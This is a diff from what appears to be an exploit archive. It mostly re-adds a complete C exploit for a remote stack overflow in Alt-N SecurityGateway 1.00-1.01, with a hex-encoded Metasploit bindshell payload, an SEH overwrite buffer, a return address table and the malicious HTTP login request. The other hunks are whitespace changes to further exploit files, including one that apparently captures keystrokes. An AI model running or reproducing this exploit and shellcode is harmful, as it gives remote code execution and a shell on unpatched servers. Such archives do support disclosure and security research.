timeout) - { - stTime.tv_sec = timeout / 1000; - stTime.tv_usec = timeout % 1000; - pstTime = &stTime; - } - - 
host = gethostbyname(remotehost); - if (!host) return SOCKET_ERROR; - - addr.sin_addr = *(struct in_addr*)host->h_addr; - addr.sin_port = htons(port); - addr.sin_family = AF_INET; - - s = socket(AF_INET, SOCK_STREAM, 0); - if (s == SOCKET_ERROR) - { - closesocket(s); - return SOCKET_ERROR; - } - - unsigned long l = 1; - ioctlsocket( s, FIONBIO, &l ) ; - - connect(s, (struct sockaddr*)&addr, sizeof(addr)); - - FD_ZERO(&x); - FD_SET(s, &x); - - res = select(NULL,NULL,&x,NULL,pstTime); - if(res< 0) return SOCKET_ERROR; - if(res==0) return 0; - return (int)s; -} - - -int hr2_tcpsend(SOCKET s, unsigned char * buf, unsigned int len, int timeout) -{ - return send(s, (char *)buf, len, 0); -} - -int hr2_tcprecv(SOCKET s, unsigned char * buf, unsigned int len, int timeout) -{ - TIMEVAL stTime; - TIMEVAL *pstTime = NULL; - fd_set xy; - int res; - - if (INFINITE != timeout) - { - stTime.tv_sec = timeout / 1000; - stTime.tv_usec = timeout % 1000; - pstTime = &stTime; - } - FD_ZERO(&xy); - FD_SET(s, &xy); - - res = select(NULL,&xy,NULL,NULL,pstTime); - - if(res==0) return 0; - if(res<0) return -1; - - return recv(s, (char *)buf, len, 0); -} - -int execute(struct _buf * abuf, char * remotehost, int port) -{ - int x; - SOCKET s ; - char RECVB[10000]; - - s = hr2_connect(remotehost, port, 10000); - if(s==0) - { - printf(" [-] connect() timeout\n"); - return 0; - } - if(s==SOCKET_ERROR) - { - printf(" [-] Connection failed\n"); - return 0; - } - x = hr2_tcpsend(s, abuf->ptr, abuf->size, 0); - printf(" [+] Sent %d out of %d bytes\n", x, abuf->size); - - x = hr2_tcprecv(s, (unsigned char *)RECVB, 1000, 0); - - closesocket(s); - return 1; -} - -// ----------------------------------------------------------------- -// XGetopt.cpp Version 1.2 -// ----------------------------------------------------------------- -int getopt(int argc, char *argv[], char *optstring) -{ - static char *next = NULL; - if (optind == 0) - next = NULL; - - optarg = NULL; - - if (next == NULL || *next == '\0') - { 
- if (optind == 0) - optind++; - - if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0') - { - optarg = NULL; - if (optind < argc) - optarg = argv[optind]; - return EOF; - } - - if (strcmp(argv[optind], "--") == 0) - { - optind++; - optarg = NULL; - if (optind < argc) - optarg = argv[optind]; - return EOF; - } - - next = argv[optind]; - next++; // skip past - - optind++; - } - - char c = *next++; - char *cp = strchr(optstring, c); - - if (cp == NULL || c == ':') - return '?'; - - cp++; - if (*cp == ':') - { - if (*next != '\0') - { - optarg = next; - next = NULL; - } - else if (optind < argc) - { - optarg = argv[optind]; - optind++; - } - else - { - return '?'; - } - } - - return c; -} -// ----------------------------------------------------------------- -// ----------------------------------------------------------------- -// ----------------------------------------------------------------- - -void print_info_banner_line(const char * key, const char * val) -{ - char temp1[100], temp2[100]; - - memset(temp1,0,sizeof(temp1)); - memset(temp1, '\x20' , 58 - strlen(val) -1); - - memset(temp2,0,sizeof(temp2)); - memset(temp2, '\x20' , 8 - strlen(key)); - printf(" # %s%s: %s%s# \n", key, temp2, val, temp1); - -} - - - -void usage(char * s) -{ - int j; - printf("\n"); - printf(" Usage: %s -h -t \n", s); - printf(" -------------------------------------------------------------------\n"); - printf(" Arguments:\n"); - printf(" -h ........ host to attack, default port: 4000\n"); - printf(" -t ........ target to use\n"); - printf(" -T ........ socket timeout\n"); - printf("\n"); - printf(" Supported SecurityGateway versions:\n"); - for(j=0; targets[j].t!=0;j++) - { - printf(" %d. %s\n",j+1, targets[j].t); - } - printf("\n"); - printf(" Code execution:\n"); - for(j=0; shellcodes[j].name!=0;j++) - { - printf(" %d. 
%s\n",j+1, shellcodes[j].name); - } - end_logo(); -} - -void logo() -{ - printf("\n\n"); - printf(" ####################################################################### \n"); - printf(" # ____ __ _ ______ __ _____ #\n"); - printf(" # / __ \\________ _____/ /_(_)_________ / __/\\ \\/ / / _ / #\n"); - printf(" # / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___ / / \\ / / // / #\n"); - printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \\ / ___/ #\n"); - printf(" # /_____/_/ \\___/ \\_,_/\\__/_/\\___/\\__,_/ /_/ /_/\\_\\/_/ #\n"); - printf(" # crew #\n"); - printf(" ####################################################################### \n"); - printf(" # Exploit : Alt-N SecurityGateway 1.00-1.01 Remote Overflow exploit # \n"); - printf(" # Solution: Update to 1.02 version # \n"); - printf(" # Author : Heretic2 < heretic2x [at] gmail.com > # \n"); - printf(" # Version : 1.0 # \n"); - printf(" # System : Windows ALL # \n"); - printf(" # Date : 11.06.2008 - 14.06.2008 # \n"); - printf(" # ------------------------------------------------------------------- # \n"); -} - -void end_logo() -{ - printf(" # ------------------------------------------------------------------- # \n"); - printf(" # Dreatica-FXP crew [Heretic2] # \n"); - printf(" ####################################################################### \n\n"); -} - -// milw0rm.com [2008-06-15] +/* Dreatica-FXP crew +* +* ---------------------------------------- +* Target : Alt-N SecurityGateway v1.00-1.01 +* ---------------------------------------- +* Exploit : Alt-N SecurityGateway v1.00-1.01 Remote Stack Overflow Exploit +* Exploit date : 11.06.2008-14.06.2008 +* Exploit writer : Heretic2 (heretic2x@gmail.com) +* OS : Windows ALL +* Crew : Dreatica-FXP +* ---------------------------------------- +* Details : Obtain the overflow and crash the application is peace a cake job. +* To make a wroking code execution here is a hell. 
First we can see that +* the username before overflow the buffer pass through some functions, +* that changes and restrict some useful chars. Firstly the beffer gets +* lowered so the overflow should not contain upper chars :( . So i decided +* to use some encoders for the payload like nonupper and non alpha from MSF. +* The nonupper use the `@` (0x40) char which the app doesn't eat at all. +* The nonalpha encoder in decoder code and the generated body contained +* always the 0xC0, 0xC1, 0x80, 0x81 which were translated to 0xE0, 0xE1, +* 0x90, 0x91. Don't know, may be this chars translation was due to my russian locale. +* After few days of work i have comed with the required bindshell which bypass +* all restricted chars and executes. Thx to skylined, for his alpha tool. +* Bad chars : 0x00 0x40 0x41 0x42 0x43 0x44 0x45 0x46 0x47 0x48 0x49 0x4A 0x4B 0x4C 0x4D 0x4E +* 0x4F 0x50 0x51 0x52 0x53 0x54 0x55 0x56 0x57 0x58 0x59 0x5A 0x40 0x7b 0xAA 0xC0 +* 0xC1 0xC2 0x80 0x81 +* ---------------------------------------- +* Thanks to: +* 1. securfrog ( ) +* 2. ALPHA 2: Zero-tolerance ( ) +* 3. The Metasploit project ( http://metasploit.com ) +* 4. Dreatica-FXP crew ( http://www.dreatica-fxp.com ) +************************************************************************************ +* This was written for educational purpose only. Use it at your own risk. Author will be not be +* responsible for any damage, caused by that code. 
+*/ + +#include +#include +#include +#include +#include + +#pragma comment(lib,"ws2_32") + + +void usage(char * s); +void logo(); +void end_logo(); +void print_info_banner_line(const char * key, const char * val); + +void extract_ip_and_port( char * &remotehost, int * port, char * str); +int fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx); + +int hr2_connect(char * remotehost, int port, int timeout); +int hr2_udpconnect(char * remotehost, int port, struct sockaddr_in * addr, int timeout); +int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout); +int execute(struct _buf * abuf, char * remotehost, int port); + +struct _buf +{ + unsigned char * ptr; + unsigned int size; +}; +int construct_shellcode(int sh, struct _buf * shf, int target); +int construct_buffer(struct _buf * shf, int target, struct _buf * abuf); + + + + +// ----------------------------------------------------------------- +// XGetopt.cpp Version 1.2 +// ----------------------------------------------------------------- +int getopt(int argc, char *argv[], char *optstring); +char *optarg; // global argument pointer +int optind = 0, opterr; // global argv index +// ----------------------------------------------------------------- +// ----------------------------------------------------------------- + + +struct { + const char * name; + int length; + char *shellcode; +}shellcodes[]={ + {"Bindshell, port 9998", 743, + /* The non-encoded metasploit payload + * windows/shell_bind_tcp - 317 bytes + * http://www.metasploit.com + * Encoder: generic/none + */ + /* + * Encoder: heretic2's nonupper. with help of skylined tool. 
+ */ + "\x6a\x20\x5b\x93\xf7\xe0\x91\xe8\xff\xff\xff\xff\x30\x5e\x5e\x66" + "\x8b\x7e\x22\x97\x3c\x60\x7c\x07\x2c\x20\x66\x93\x88\x5e\x22\x83" + "\xee\xff\xe2\xeb\xe8\xff\xff\xff\xff\x36\x5b\x5b\x93\x91\x83\xe9" + "\xf8\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x71\x7a\x76\x74" + "\x78\x33\x30\x76\x78\x34\x61\x70\x30\x61\x33\x68\x68\x30\x61\x30" + "\x30\x61\x62\x61\x61\x62\x74\x61\x61\x71\x32\x61\x62\x32\x62\x62" + "\x30\x62\x62\x78\x70\x38\x61\x63\x6a\x6a\x69\x6b\x6c\x32\x6a\x6a" + "\x6b\x70\x6d\x6a\x68\x7a\x79\x6b\x6f\x6b\x6f\x6b\x6f\x33\x70\x6c" + "\x6b\x72\x6c\x36\x64\x71\x34\x6c\x6b\x71\x75\x77\x6c\x6c\x6b\x73" + "\x6c\x73\x35\x33\x68\x35\x71\x7a\x6f\x6c\x6b\x70\x6f\x35\x68\x6c" + "\x6b\x71\x6f\x67\x70\x75\x71\x6a\x6b\x77\x39\x6c\x6b\x77\x64\x6c" + "\x6b\x75\x71\x7a\x6e\x76\x71\x69\x70\x6d\x69\x6e\x6c\x6b\x34\x69" + "\x70\x72\x74\x63\x37\x6f\x31\x38\x6a\x74\x6d\x35\x71\x79\x72\x6a" + "\x6b\x6b\x64\x77\x6b\x71\x64\x67\x74\x67\x78\x32\x75\x6d\x35\x6c" + "\x6b\x71\x6f\x77\x74\x35\x71\x6a\x6b\x32\x66\x6c\x6b\x74\x6c\x70" + "\x6b\x6c\x6b\x71\x6f\x35\x6c\x75\x71\x6a\x6b\x75\x73\x66\x6c\x6c" + "\x6b\x6b\x39\x62\x6c\x76\x64\x75\x6c\x33\x71\x6f\x33\x66\x71\x79" + "\x6b\x75\x34\x6c\x6b\x71\x73\x36\x70\x6c\x6b\x71\x70\x74\x6c\x6c" + "\x6b\x72\x70\x75\x6c\x6e\x6d\x6c\x6b\x71\x70\x35\x78\x71\x6e\x73" + "\x78\x6c\x6e\x70\x6e\x64\x6e\x7a\x6c\x30\x70\x6b\x6f\x78\x76\x35" + "\x36\x76\x33\x32\x66\x33\x78\x70\x33\x77\x62\x72\x68\x72\x77\x34" + "\x33\x76\x72\x71\x6f\x70\x74\x6b\x6f\x78\x70\x62\x68\x38\x6b\x6a" + "\x6d\x6b\x6c\x77\x6b\x66\x30\x6b\x6f\x78\x76\x71\x6f\x6b\x39\x6a" + "\x65\x73\x76\x6d\x71\x7a\x6d\x73\x38\x64\x62\x70\x75\x62\x6a\x35" + "\x72\x6b\x6f\x6e\x30\x72\x68\x78\x79\x75\x79\x6b\x65\x6e\x6d\x66" + "\x37\x6b\x6f\x79\x66\x36\x33\x70\x73\x71\x63\x71\x63\x70\x73\x71" + "\x73\x71\x63\x31\x73\x36\x33\x6b\x6f\x68\x70\x32\x66\x65\x38\x71" + "\x37\x74\x6e\x72\x66\x71\x63\x6b\x39\x6b\x71\x6c\x75\x73\x78\x6f" + 
"\x74\x75\x6a\x74\x30\x6f\x37\x30\x77\x6b\x6f\x79\x66\x32\x6a\x64" + "\x70\x36\x31\x31\x65\x6b\x6f\x6e\x30\x75\x38\x6e\x64\x6e\x6d\x76" + "\x6e\x6b\x79\x71\x67\x6b\x6f\x78\x76\x70\x73\x70\x75\x6b\x6f\x78" + "\x70\x65\x38\x6b\x75\x31\x79\x6c\x66\x70\x69\x30\x77\x6b\x6f\x6e" + "\x36\x70\x70\x31\x64\x71\x64\x76\x35\x6b\x6f\x78\x70\x6c\x73\x72" + "\x68\x6d\x37\x63\x69\x39\x76\x32\x79\x71\x67\x6b\x6f\x6e\x36\x71" + "\x65\x6b\x6f\x78\x70\x73\x76\x73\x7a\x35\x34\x32\x66\x72\x68\x75" + "\x33\x72\x6d\x6d\x79\x6b\x75\x72\x6a\x76\x30\x76\x39\x71\x39\x68" + "\x6c\x6b\x39\x6d\x37\x72\x6a\x30\x64\x6b\x39\x6b\x72\x76\x71\x6f" + "\x30\x7a\x73\x6e\x6a\x6b\x6e\x70\x62\x76\x6d\x6b\x6e\x67\x32\x36" + "\x6c\x6a\x33\x6c\x6d\x33\x6a\x76\x78\x6e\x6b\x6e\x6b\x6e\x6b\x63" + "\x78\x73\x62\x6b\x6e\x6e\x73\x74\x76\x6b\x6f\x62\x75\x70\x64\x6b" + "\x6f\x38\x76\x71\x6b\x76\x37\x76\x32\x30\x71\x30\x71\x70\x71\x72" + "\x6a\x65\x71\x30\x71\x30\x71\x30\x75\x70\x71\x6b\x6f\x78\x70\x75" + "\x38\x6e\x6d\x6e\x39\x74\x65\x78\x6e\x70\x73\x6b\x6f\x6e\x36\x73" + "\x7a\x6b\x6f\x6b\x6f\x36\x77\x6b\x6f\x6e\x30\x6c\x6b\x36\x37\x6b" + "\x6c\x6b\x33\x69\x74\x75\x34\x6b\x6f\x38\x76\x66\x32\x6b\x6f\x38" + "\x70\x33\x78\x7a\x70\x6c\x6a\x63\x34\x71\x6f\x66\x33\x6b\x6f\x6e" + "\x36\x6b\x6f\x68\x70\x61\x61" + }, + {NULL, 0, NULL} +}; + + + + +struct _target{ + const char *t ; + unsigned long ret ; +} targets[]= +{ + {"Alt-N SecurityGateway 1.00/1.01 universal", 0x67672190 }, // nonupper pop/pop/ret + {"DOS/Crash/Debug/Test/Fun", 0x61616161 }, + {NULL, 0x00000000 } +}; + +// memory for buffers +unsigned char payloadbuffer[10000], a_buffer[10000]; +long dwTimeout=5000; +int timeout=5000; + + +int main(int argc, char **argv) +{ + char c,*remotehost=NULL,temp1[100]; + int sh,port=4000,itarget=0; + struct _buf fshellcode, sbuffer; + + logo(); + if(argc<2) + { + usage(argv[0]); + return -1; + } + + WSADATA wsa; + WSAStartup(MAKEWORD(2,0), &wsa); + // set defaults + sh=0; + // ------------ + + while((c = getopt(argc, argv, 
"h:t:R:T:"))!= EOF) + { + switch (c) + { + case 'h': + if (strchr(optarg,':')==NULL) + { + remotehost=optarg; + }else + { + sscanf(strchr(optarg,':')+1, "%d", &port); + remotehost=optarg; + *(strchr(remotehost,':'))='\0'; + } + break; + case 't': + sscanf(optarg, "%d", &itarget); + itarget--; + break; + case 'T': + sscanf(optarg, "%ld", &dwTimeout); + break; + default: + usage(argv[0]); + WSACleanup(); + return -1; + } + } + + if(remotehost == NULL) + { + printf(" [-] Please enter remotehost\n"); + end_logo(); + WSACleanup(); + return -1; + } + print_info_banner_line("Host", remotehost); + sprintf(temp1, "%d", port); + print_info_banner_line("Port", temp1); + print_info_banner_line("Payload", shellcodes[sh].name); + sprintf(temp1, "%d", 9998); + print_info_banner_line("BINDPort", temp1); + + printf(" # ------------------------------------------------------------------- # \n"); + fflush(stdout); + + + memset(payloadbuffer, 0, sizeof(payloadbuffer)); + fshellcode.ptr=payloadbuffer; + fshellcode.size=0; + + memset(a_buffer, 0, sizeof(a_buffer)); + sbuffer.ptr=a_buffer; + sbuffer.size=0; + + if(!construct_shellcode(sh, &fshellcode, itarget)) + { + end_logo(); + WSACleanup(); + return -1; + } + + printf(" [+] Payload constructed\n"); + + if(!construct_buffer(&fshellcode, itarget, &sbuffer)) + { + printf(" [-] Buffer not constructed\n"); + end_logo(); + WSACleanup(); + return -1; + } + printf(" [+] Final buffer constructed\n"); + + + if(!execute(&sbuffer, remotehost, port)) + { + printf(" [-] Buffer not sent\n"); + end_logo(); + WSACleanup(); + return -1; + } + printf(" [+] Buffer sent\n"); + + end_logo(); + WSACleanup(); + return 0; +} + +int construct_shellcode(int sh, struct _buf * shf, int target) +{ + memcpy(shf->ptr, shellcodes[sh].shellcode, shellcodes[sh].length); + shf->size=shellcodes[sh].length; + + return 1; +} + + + +char templ1[] = "POST /SecurityGateway.dll HTTP/1.0\r\n" +"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, 
application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\n" +"Accept-Language: ru\r\n" +"Content-Type: application/x-www-form-urlencoded\r\n" +"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n" +"Content-Length: %d\r\n\r\n"; +char templ2[]="RequestedPage=login&username=%s&passwd=world&lang=en&logon=Sign+In"; + +int encode_uri(char * in, int len, char * out, int *outlen) +{ + char *out2=out; + int i; + memset(out,0,*outlen); + for(i=0;iptr; + + memset(buf,0,sizeof(buf)); + memset(buf2,0,sizeof(buf2)); + memset(rstr1,0,sizeof(rstr1)); + memset(rstr2,0,sizeof(rstr2)); + + lp=buf; + + // overflow + memset(lp,'\x61',476); + lp+=476; + + // jmp over seh + *lp++='\x90'; + *lp++='\x90'; + *lp++='\xeb'; + *lp++='\x04'; + + // replace SEH + *lp++ = (char)((targets[target].ret ) & 0xff); + *lp++ = (char)((targets[target].ret >> 8) & 0xff); + *lp++ = (char)((targets[target].ret >> 16) & 0xff); + *lp++ = (char)((targets[target].ret >> 24) & 0xff); + + memset(lp,'\x90',1500); + lp+=5; + + memcpy(lp, shf->ptr, shf->size); + lp+=shf->size; + + + olen = 1500; + encode_uri(buf, (int)strlen(buf), buf2, &olen); + sprintf(rstr2,templ2,buf2); + sprintf(rstr1,templ1,strlen(rstr2)); + + strcat((char*)cp,rstr1); + strcat((char*)cp,rstr2); + + cp+=strlen((char*)cp); + abuf->size=(int)(cp-abuf->ptr); + return 1; +} + + +void extract_ip_and_port( char * &remotehost, int * port, char * str) +{ + if (strchr(str,':')==NULL) + { + remotehost=str; + }else + { + sscanf(strchr(str,':')+1, "%d", port); + remotehost=str; + *(strchr(remotehost,':'))='\0'; + } +} + + + +int hr2_connect(char * remotehost, int port, int timeout) +{ + SOCKET s; + struct hostent *host; + struct sockaddr_in addr; + TIMEVAL stTime; + TIMEVAL *pstTime = NULL; + fd_set x; + int res; + + if (INFINITE != timeout) + { + stTime.tv_sec = timeout / 1000; + stTime.tv_usec = timeout % 1000; + pstTime = &stTime; + } + + 
host = gethostbyname(remotehost); + if (!host) return SOCKET_ERROR; + + addr.sin_addr = *(struct in_addr*)host->h_addr; + addr.sin_port = htons(port); + addr.sin_family = AF_INET; + + s = socket(AF_INET, SOCK_STREAM, 0); + if (s == SOCKET_ERROR) + { + closesocket(s); + return SOCKET_ERROR; + } + + unsigned long l = 1; + ioctlsocket( s, FIONBIO, &l ) ; + + connect(s, (struct sockaddr*)&addr, sizeof(addr)); + + FD_ZERO(&x); + FD_SET(s, &x); + + res = select(NULL,NULL,&x,NULL,pstTime); + if(res< 0) return SOCKET_ERROR; + if(res==0) return 0; + return (int)s; +} + + +int hr2_tcpsend(SOCKET s, unsigned char * buf, unsigned int len, int timeout) +{ + return send(s, (char *)buf, len, 0); +} + +int hr2_tcprecv(SOCKET s, unsigned char * buf, unsigned int len, int timeout) +{ + TIMEVAL stTime; + TIMEVAL *pstTime = NULL; + fd_set xy; + int res; + + if (INFINITE != timeout) + { + stTime.tv_sec = timeout / 1000; + stTime.tv_usec = timeout % 1000; + pstTime = &stTime; + } + FD_ZERO(&xy); + FD_SET(s, &xy); + + res = select(NULL,&xy,NULL,NULL,pstTime); + + if(res==0) return 0; + if(res<0) return -1; + + return recv(s, (char *)buf, len, 0); +} + +int execute(struct _buf * abuf, char * remotehost, int port) +{ + int x; + SOCKET s ; + char RECVB[10000]; + + s = hr2_connect(remotehost, port, 10000); + if(s==0) + { + printf(" [-] connect() timeout\n"); + return 0; + } + if(s==SOCKET_ERROR) + { + printf(" [-] Connection failed\n"); + return 0; + } + x = hr2_tcpsend(s, abuf->ptr, abuf->size, 0); + printf(" [+] Sent %d out of %d bytes\n", x, abuf->size); + + x = hr2_tcprecv(s, (unsigned char *)RECVB, 1000, 0); + + closesocket(s); + return 1; +} + +// ----------------------------------------------------------------- +// XGetopt.cpp Version 1.2 +// ----------------------------------------------------------------- +int getopt(int argc, char *argv[], char *optstring) +{ + static char *next = NULL; + if (optind == 0) + next = NULL; + + optarg = NULL; + + if (next == NULL || *next == '\0') + { 
+ if (optind == 0) + optind++; + + if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0') + { + optarg = NULL; + if (optind < argc) + optarg = argv[optind]; + return EOF; + } + + if (strcmp(argv[optind], "--") == 0) + { + optind++; + optarg = NULL; + if (optind < argc) + optarg = argv[optind]; + return EOF; + } + + next = argv[optind]; + next++; // skip past - + optind++; + } + + char c = *next++; + char *cp = strchr(optstring, c); + + if (cp == NULL || c == ':') + return '?'; + + cp++; + if (*cp == ':') + { + if (*next != '\0') + { + optarg = next; + next = NULL; + } + else if (optind < argc) + { + optarg = argv[optind]; + optind++; + } + else + { + return '?'; + } + } + + return c; +} +// ----------------------------------------------------------------- +// ----------------------------------------------------------------- +// ----------------------------------------------------------------- + +void print_info_banner_line(const char * key, const char * val) +{ + char temp1[100], temp2[100]; + + memset(temp1,0,sizeof(temp1)); + memset(temp1, '\x20' , 58 - strlen(val) -1); + + memset(temp2,0,sizeof(temp2)); + memset(temp2, '\x20' , 8 - strlen(key)); + printf(" # %s%s: %s%s# \n", key, temp2, val, temp1); + +} + + + +void usage(char * s) +{ + int j; + printf("\n"); + printf(" Usage: %s -h -t \n", s); + printf(" -------------------------------------------------------------------\n"); + printf(" Arguments:\n"); + printf(" -h ........ host to attack, default port: 4000\n"); + printf(" -t ........ target to use\n"); + printf(" -T ........ socket timeout\n"); + printf("\n"); + printf(" Supported SecurityGateway versions:\n"); + for(j=0; targets[j].t!=0;j++) + { + printf(" %d. %s\n",j+1, targets[j].t); + } + printf("\n"); + printf(" Code execution:\n"); + for(j=0; shellcodes[j].name!=0;j++) + { + printf(" %d. 
%s\n",j+1, shellcodes[j].name); + } + end_logo(); +} + +void logo() +{ + printf("\n\n"); + printf(" ####################################################################### \n"); + printf(" # ____ __ _ ______ __ _____ #\n"); + printf(" # / __ \\________ _____/ /_(_)_________ / __/\\ \\/ / / _ / #\n"); + printf(" # / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___ / / \\ / / // / #\n"); + printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \\ / ___/ #\n"); + printf(" # /_____/_/ \\___/ \\_,_/\\__/_/\\___/\\__,_/ /_/ /_/\\_\\/_/ #\n"); + printf(" # crew #\n"); + printf(" ####################################################################### \n"); + printf(" # Exploit : Alt-N SecurityGateway 1.00-1.01 Remote Overflow exploit # \n"); + printf(" # Solution: Update to 1.02 version # \n"); + printf(" # Author : Heretic2 < heretic2x [at] gmail.com > # \n"); + printf(" # Version : 1.0 # \n"); + printf(" # System : Windows ALL # \n"); + printf(" # Date : 11.06.2008 - 14.06.2008 # \n"); + printf(" # ------------------------------------------------------------------- # \n"); +} + +void end_logo() +{ + printf(" # ------------------------------------------------------------------- # \n"); + printf(" # Dreatica-FXP crew [Heretic2] # \n"); + printf(" ####################################################################### \n\n"); +} + +// milw0rm.com [2008-06-15] diff --git a/platforms/windows/remote/583.pl b/platforms/windows/remote/583.pl index 873b8bb49..015442211 100755 --- a/platforms/windows/remote/583.pl +++ b/platforms/windows/remote/583.pl @@ -74,6 +74,6 @@ if($data =~ /Received/) { print "[*] Exploit may not have worked.\n"; } -$sock->shutdown(2); - -# milw0rm.com [2004-10-18] +$sock->shutdown(2); + +# milw0rm.com [2004-10-18] diff --git a/platforms/windows/remote/584.c b/platforms/windows/remote/584.c index db5d0edb6..72d60a2cd 100755 --- a/platforms/windows/remote/584.c +++ b/platforms/windows/remote/584.c 
@@ -229,6 +229,6 @@ fp); fclose(fp); return 0; -} - -// milw0rm.com [2004-10-20] +} + +// milw0rm.com [2004-10-20] diff --git a/platforms/windows/remote/589.html b/platforms/windows/remote/589.html index ae247fccd..3c0f0415a 100755 --- a/platforms/windows/remote/589.html +++ b/platforms/windows/remote/589.html @@ -6,7 +6,7 @@
    Result: (Keystrokes you pressed on the CitiBank website.)
    - -
    - -// milw0rm.com [2004-10-22] +